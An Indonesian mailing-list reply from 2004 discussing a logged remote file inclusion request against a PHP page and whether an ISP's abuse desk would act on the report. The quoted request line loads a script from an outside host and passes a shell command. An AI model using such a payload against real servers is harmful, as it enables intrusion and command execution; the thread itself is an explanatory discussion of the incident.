13/03/2004 17:04:32, Rio menulis:

/main.php?cont=http://develbox.bhc.or.id/~pupet/pupet&cahyo=cd%20/var/tmp%20;%20cat%20cahyo.txt

Kalo boleh saya duga sebenarnya yg dituju itu adalah halaman pribadi
(~pupet), mungkin juga yg mengaksesnya yg punya situs tsb.

Saya sendiri sering menaruh script2 tertentu, contoh yg mudah misalnya
script berisi phpinfo. Script yg ekstrim bahkan bisa melakukan
perintah shell (spt kasus di atas), yg seringkali tanpa password.
Pemisahnya hanya tahu dan tidak tahu adanya script tsb.

RM> Oh ya sengaja saya buka ini ke public, sebab saya capek nungguin
RM> tanggapan abuse nya Indosatnet, kagak respon. Berhati-hatilah

Bila saya berlaku sbg adminnya Indosatnet, apa yg saya bisa perbuat
dgn laporan abuse tsb? Anda tahu abuse dari mana? Kecuali ada kasus
lebih lanjut, misalnya jebolnya server, dlm hitungan detik email tsb
berpindah ke trash-box.

Tertanda,
Oguds [36856104]